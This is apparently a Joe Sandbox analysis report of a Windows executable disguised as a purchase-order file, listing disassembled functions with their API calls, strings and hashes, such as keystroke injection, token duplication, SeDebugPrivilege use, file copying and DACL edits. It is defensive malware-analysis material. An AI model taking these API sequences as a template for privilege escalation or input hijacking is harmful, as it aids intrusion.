Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C

Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
GetKeyState.USER32(00000011), ref: 0047C1A4
GetKeyState.USER32(00000009), ref: 0047C1AD
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
GetKeyState.USER32(00000010), ref: 0047C1CA
GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
SendMessageW.USER32 ref: 0047C2FB

Strings

F, xrefs: 0047C7ED
@GUI_DRAGID, xrefs: 0047C45E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$State$LongProcWindow
String ID: @GUI_DRAGID$F
API String ID: 1562745308-4164748364
Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A

Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
IsIconic.USER32(?), ref: 004375E1
ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
SetForegroundWindow.USER32(?), ref: 004375FD
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
GetCurrentThreadId.KERNEL32 ref: 00437619
GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
SetForegroundWindow.USER32(?), ref: 00437645
MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
keybd_event.USER32(00000012,00000000), ref: 0043765D
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
keybd_event.USER32(00000012,00000000), ref: 00437674
MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
keybd_event.USER32(00000012,00000000), ref: 0043768B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
keybd_event.USER32(00000012,00000000), ref: 004376A2
SetForegroundWindow.USER32(?), ref: 004376AD
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9

Strings

Shell_TrayWnd, xrefs: 004375D3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 3778422247-2988720461
Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79

Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044621B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
_wcslen.LIBCMT ref: 0044639E

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

_wcsncpy.LIBCMT ref: 004463C7
LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8

Strings

, xrefs: 00446227
winsta0, xrefs: 0044629F
default, xrefs: 004462DF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
String ID: $default$winsta0
API String ID: 2173856841-1027155976
Opcode ID: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
Opcode Fuzzy Hash: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B

Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,?,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,004A8E80,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,0040F3D2), ref: 0040FFCA

Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93

Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9

_wcscat.LIBCMT ref: 0044BD96
_wcscat.LIBCMT ref: 0044BDBF
__wsplitpath.LIBCMT ref: 0044BDEC
FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
_wcscpy.LIBCMT ref: 0044BE73
_wcscat.LIBCMT ref: 0044BE85
_wcscat.LIBCMT ref: 0044BE97
lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
DeleteFileW.KERNEL32(?), ref: 0044BED5
MoveFileW.KERNEL32(?,?), ref: 0044BEF5
CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
DeleteFileW.KERNEL32(?), ref: 0044BF17
CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
FindClose.KERNEL32(00000000), ref: 0044BF35
MoveFileW.KERNEL32(?,?), ref: 0044BF51
FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
FindClose.KERNEL32(00000000), ref: 0044BF7E

Strings

\*.*, xrefs: 0044BD90, 0044BDB9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
String ID: \*.*
API String ID: 2188072990-1173974218
Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA

Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 004203A4

Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8

__get_daylight.LIBCMT ref: 004203B0
__invoke_watson.LIBCMT ref: 004203BF
__get_daylight.LIBCMT ref: 004203CB
__invoke_watson.LIBCMT ref: 004203DA
____lc_codepage_func.LIBCMT ref: 004203E2
_strlen.LIBCMT ref: 00420442
__malloc_crt.LIBCMT ref: 00420449
_strlen.LIBCMT ref: 0042045F
_strcpy_s.LIBCMT ref: 0042046D
__invoke_watson.LIBCMT ref: 00420482
GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C

Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01

__invoke_watson.LIBCMT ref: 004205CC

Strings

S\, xrefs: 00420404

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
String ID: S\
API String ID: 4084823496-393906132
Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C

Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
__swprintf.LIBCMT ref: 00434D91
_wcslen.LIBCMT ref: 00434D9B
_wcslen.LIBCMT ref: 00434DB0
_wcslen.LIBCMT ref: 00434DC5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
_memset.LIBCMT ref: 00434E27
_wcslen.LIBCMT ref: 00434E3C
_wcsncpy.LIBCMT ref: 00434E6F
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
CloseHandle.KERNEL32(00000000), ref: 00434EB4
RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
CloseHandle.KERNEL32(00000000), ref: 00434ECE

Strings

:, xrefs: 00434DB8
\, xrefs: 00434DA3
\??\%s, xrefs: 00434D8B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 302090198-3457252023
Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A

Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
GetLastError.KERNEL32 ref: 004644B4
GetCurrentThread.KERNEL32 ref: 004644C8
OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
OpenProcessToken.ADVAPI32(00000000), ref: 004644E7

Strings

SeDebugPrivilege, xrefs: 00464511

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
String ID: SeDebugPrivilege
API String ID: 1312810259-2896544425
Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA

Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
__wsplitpath.LIBCMT ref: 004038B2

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcscpy.LIBCMT ref: 004038C7
_wcscat.LIBCMT ref: 004038DC
SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B

_wcscpy.LIBCMT ref: 004039C2
_wcslen.LIBCMT ref: 00403A53
_wcslen.LIBCMT ref: 00403AAA

Strings

Unterminated string, xrefs: 0042B9BA
_, xrefs: 00403B48
Error opening the file, xrefs: 0042B8AC
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
API String ID: 4115725249-188983378
Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB

Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00434C12
GetFileAttributesW.KERNEL32(?), ref: 00434C4F
SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
FindClose.KERNEL32(00000000), ref: 00434C88
FindClose.KERNEL32(00000000), ref: 00434C9C
FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
FindClose.KERNEL32(00000000), ref: 00434D35
FindClose.KERNEL32(00000000), ref: 00434D43

Strings

*.*, xrefs: 00434CB2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9

Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00444082
timeGetTime.WINMM ref: 0044409D
Sleep.KERNEL32(0000000A), ref: 00444183

Strings

BUTTON, xrefs: 004440D8

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Timetime$Sleep
String ID: BUTTON
API String ID: 4176159691-3405671355
Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C

Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B

Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5

GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
_memset.LIBCMT ref: 00445E61
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
GetLengthSid.ADVAPI32(?), ref: 00445E92
GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3490752873-0
Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
